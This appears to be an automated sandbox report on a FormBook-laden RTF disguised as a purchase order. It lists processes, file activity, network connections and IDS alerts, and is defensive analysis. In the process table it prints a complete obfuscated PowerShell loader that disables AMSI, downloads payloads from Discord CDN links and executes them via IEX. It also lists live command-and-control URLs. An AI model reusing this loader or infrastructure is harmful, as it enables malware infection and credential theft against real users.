File name: | PO20200929.doc |
Full analysis: | https://app.any.run/tasks/23e13c17-888c-4cfe-9397-022745e94d3c |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | September 30, 2020, 06:17:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 913C3801315D0FFFD607F0CFC578FD26 |
SHA1: | 614C67E1939E27690984EAF27155D5A27EC8A359 |
SHA256: | B60E9F743293EB901A62F9F792CE8C4BB35860AE7B316118CF2FC0EED50768BB |
SSDEEP: | 1536:UbGarcJnbGaYfLLLLLLLLdnnndTdnnnnnWnnnnnnlnnnnnnnnnnnnfRTx0FQukn5:aG |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\PO20200929.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
184 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2892 | CmD.exe /C cscript %tmp%\vx.vbs AC | C:\Windows\system32\CmD.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3132 | cscript C:\Users\admin\AppData\Local\Temp\vx.vbs AC | C:\Windows\system32\cscript.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
916 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
804 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2720 | cmd /c sc query wcncsvc >> AC | C:\Windows\system32\cmd.exe | — | cscript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2052 | Powershell $9FB908084D324E080AAB830AC825B90C759FEEFD231824EFE18159E09E0B=@(40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,39,43,36,40,91,67,72,97,114,93,40,49,48,50,45,51,55,41,43,91,67,72,65,82,93,40,91,98,121,116,69,93,48,120,54,68,41,43,91,67,72,65,82,93,40,49,55,50,53,47,49,53,41,43,91,67,104,65,82,93,40,49,56,50,45,55,55,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,39,39,43,36,40,91,67,72,65,114,93,40,49,49,55,45,50,48,41,43,91,99,72,97,82,93,40,53,56,56,54,47,53,52,41,43,91,67,72,65,82,93,40,50,48,50,45,56,55,41,43,91,67,104,97,114,93,40,49,56,56,45,56,51,41,41,43,39,73,110,105,116,70,97,105,108,101,100,39,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,32,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,40,36,97,61,36,97,61,87,114,105,116,101,45,72,111,115,116,32,39,124,124,42,42,124,124,42,42,124,124,42,42,124,124,42,42,124,39,41,59,32,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,53,57,56,52,53,57,51,52,52,49,56,52,57,51,57,53,47,55,54,48,48,53,53,54,49,52,49,53,48,57,51,52,53,52,56,47,115,116,46,106,112,103,39,41,124,73,96,69,96,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,35,35,35,35,108,111,97,100,83,116,114,105,35,35,35,35,103,39,46,114,101,112,108,97,99,101,40,39,35,35,35,35,39,44,39,110,39,41,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,55,50,53,57,56,52,53,57,51,52,52,49,56,52,57,51,57,53,47,55,54,48,48,53,53,51,54,52,52,56,48,57,50,53,54,57,54,47,112,97,46,106,112,103,39,41,46,114,101,112,108,97,99,101,40,39,42,42,39,44,39,48,120,39,41,124,73,96,69,96,88,59,91,72,97,110,100,108,101,82,117,110,93,58,58,95,95,95,95,95,95,95,95,95,95,95,95,95,95,70,70,70,70,70,95,95,95,95,95,95,95,95,95,95,95,95,95,95,40,39,99,97,108,99,46,101,120,101,39,44,36,102,41);[char[]]$9FB908084D324E080AAB830AC825B90C759FEEFD231824EFE18159E09E0B-join ''|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1860 | "{path}" | C:\WINDOWS\system32\calc.exe | — | Powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Calculator Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2816 | "C:\Windows\System32\wininit.exe" | C:\Windows\System32\wininit.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Start-Up Application Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7A0C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1M8M9WY9Q1HVCYWUGOAO.temp | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c102d2ec60b705b2801a8f0c13d50dba_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e6d91a9e84ba5e2a654e4b118a27ce31_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\6bbf59a988992657e1bf0d703d401605_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\663583b190a21dfbbf9b074ea4fb905f_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\ec42938835fa336e7158437d602b31c8_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7635b5489e8306fb7f08b1a750fd3ce7_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7754ad066ed5100fb3b5ac8519bbc89c_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— | |||
2052 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\9bf03b3f463894d88ca0bcabd46a4222_90059c37-1320-41a4-b58d-2b75a9850d2f | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
392 | explorer.exe | GET | 302 | 23.94.150.194:80 | http://www.expressionmusicschool.com/tni/?KjwtQ=jN8uLX3ofkhq48Z1pS70elWGwkdcCsxATSq0aDjpxqSDG9jIl38AEyeS8rN8EamirxADxA==&4hD=uDzXnVxHSZclutK | US | html | 349 b | malicious |
392 | explorer.exe | GET | 404 | 212.111.215.111:80 | http://www.escierm.com/tni/?KjwtQ=9+Fdj4dAFExhuk4xWG/BUswEhRNBK7pf4yc0k8VRjp1LtuE2l85SJ7ENNPgSPnjU4fqVLg==&4hD=uDzXnVxHSZclutK | UA | html | 283 b | malicious |
392 | explorer.exe | GET | — | 192.185.46.53:80 | http://www.adsanitizing.com/tni/?KjwtQ=EYCgp5MQo5ESHoz2wbVOqOWNsC63SxmR9n8UKLmt6Zn5a9wV+AlJS/JY1a3tX+8k91iNuA==&4hD=uDzXnVxHSZclutK | US | — | — | malicious |
392 | explorer.exe | GET | — | 104.232.159.141:80 | http://www.xintianshipin.com/tni/?KjwtQ=B2QgAMbX1MAVGQCYxnJvCbs0NvQfOyXhzDa6er+w55jbP9v3OEZUsrzDtls7k7/g2c1IWw==&4hD=uDzXnVxHSZclutK | US | — | — | unknown |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.scooterhiresw.com/tni/?KjwtQ=n0ZZLkLNzLPuH1l0NJBEgJWQGUBKMkLBAZnJZBzj1GIlbsbCd3cDSQnTKQypQfxCL6BHdA==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | — | 219.94.129.222:80 | http://www.charm-cheer.com/tni/?KjwtQ=uJy5N3MXb4A8vqeASo3Z4/3ntiuMq7jbE2uVxymq+74qeva7atr8P3KoNiWpO6ffLT8GFw==&4hD=uDzXnVxHSZclutK | JP | — | — | malicious |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.santabarbaracoastrealty.com/tni/?KjwtQ=oFNWXmw9TMeY44Of+h8/XB/P2WOdTbEYyh+S4gK/yH5u/0uu/rn+N2OTAXULZMc+KmW/rw==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | 403 | 34.102.136.180:80 | http://www.hideoutparkcity.com/tni/?KjwtQ=G8IE7UXKe62F9OuCyHDHHPMLXA4FKIjF8+Mat5OrNc18bzvgvMzU5Xk5qoRSi79NdHcpYg==&4hD=uDzXnVxHSZclutK | US | html | 275 b | whitelisted |
392 | explorer.exe | GET | 200 | 160.124.201.54:80 | http://www.warezmoviez.com/tni/?KjwtQ=GyHA4izXPaiBqOmZJr9mOAalvMjNz3hWGDiEhFLT3b9jJnLnnYBH3+rDRbW4/b5yyHlIGQ==&4hD=uDzXnVxHSZclutK | ZA | binary | 1 b | malicious |
392 | explorer.exe | GET | 200 | 204.11.56.48:80 | http://www.scmeag.com/tni/?KjwtQ=ivd3Hw0WLcenX1n8nmxEw2CVY+qGAA4jT52jjBLsPr7UdkHskzjRYGriwAeZaKj01qQLLQ==&4hD=uDzXnVxHSZclutK | VG | html | 272 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
392 | explorer.exe | 34.102.136.180:80 | www.scooterhiresw.com | — | US | whitelisted |
2052 | Powershell.exe | 162.159.130.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
392 | explorer.exe | 23.94.150.194:80 | www.expressionmusicschool.com | ColoCrossing | US | malicious |
392 | explorer.exe | 212.111.215.111:80 | www.escierm.com | Association of users of Ukrainian Research & Academic Network URAN | UA | malicious |
392 | explorer.exe | 219.94.129.222:80 | www.charm-cheer.com | SAKURA Internet Inc. | JP | malicious |
392 | explorer.exe | 104.232.159.141:80 | www.xintianshipin.com | eSited Solutions | US | unknown |
392 | explorer.exe | 192.185.46.53:80 | www.adsanitizing.com | CyrusOne LLC | US | malicious |
392 | explorer.exe | 204.11.56.48:80 | www.scmeag.com | Confluence Networks Inc | VG | malicious |
392 | explorer.exe | 160.124.201.54:80 | www.warezmoviez.com | — | ZA | malicious |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
cdn.discordapp.com |
| shared |
www.expressionmusicschool.com |
| malicious |
www.scooterhiresw.com |
| whitelisted |
www.escierm.com |
| unknown |
www.santabarbaracoastrealty.com |
| whitelisted |
www.sorgse.com |
| unknown |
www.hideoutparkcity.com |
| whitelisted |
www.charm-cheer.com |
| malicious |
www.adsanitizing.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |
392 | explorer.exe | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |